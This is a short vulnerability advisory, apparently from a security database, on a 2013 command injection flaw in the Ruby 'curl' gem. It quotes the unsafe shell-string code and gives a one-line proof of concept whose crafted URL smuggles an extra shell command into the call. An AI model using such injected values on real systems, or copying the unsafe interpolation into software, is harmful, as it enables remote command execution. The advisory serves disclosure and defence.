Ruby Gem Curl Command Execution

2013-03-13 / 2013-06-16
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

?Curl Ruby Gem Remote command execution 3/12/2013 https://github.com/tg0/curl Specially crafted URLs can result in remote code execution: In ./lib/curl.rb the following lines: 131 cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref} \"{url}\" " 132 if @debug 133 puts cmd.red 134 end 135 result = open_pipe(cmd) PoC: page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"") larry@underfl0w:/tmp$ cat p uid=0(root) gid=0(root) groups=0(root) Larry W. Cashdollar @_larry0 http://vapid.dhs.org

References:

https://github.com/tg0/curl


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top